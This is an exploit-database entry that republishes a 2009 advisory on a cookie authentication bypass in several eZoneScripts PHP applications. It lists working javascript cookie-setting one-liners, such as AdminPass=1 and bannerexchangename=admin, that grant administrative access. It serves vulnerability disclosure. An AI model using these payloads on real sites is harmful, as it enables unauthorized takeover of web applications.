eZoneScripts (Multiple Scripts) - Insecure Cookie Authentication Bypass



EKU-ID: 38710 CVE: OSVDB-ID:
Author: JIKO Published: 2009-02-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/39912/info

eZoneScripts Banner Exchange Website, Adult Banner Exchange Website, Apartment Search Script, phpMiniSite Script, and Classified Ultra Script are prone to an authentication-bypass vulnerability because they fail to adequately verify user-supplied input used for cookie-based authentication.

Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.

The following example cookie data is available:

Banner Exchange Website and Adult Banner Exchange Website:

javascript:document.cookie="bannerexchangename=admin; path=/";
javascript:document.cookie="bannerexchangerand=905; path=/";


Classified Ultra Script:

javascript:document.cookie="AdminPass=1; path=/productdemos/ClassifiedUltra/Site_Admin/";


Apartment Search Script:

javascript:document.cookie="SiteAdminPass=1; path=/productdemos/ApartmentSearch/Site_Admin/";


phpMiniSite Script:

javascript:document.cookie="auth=fook; path=/";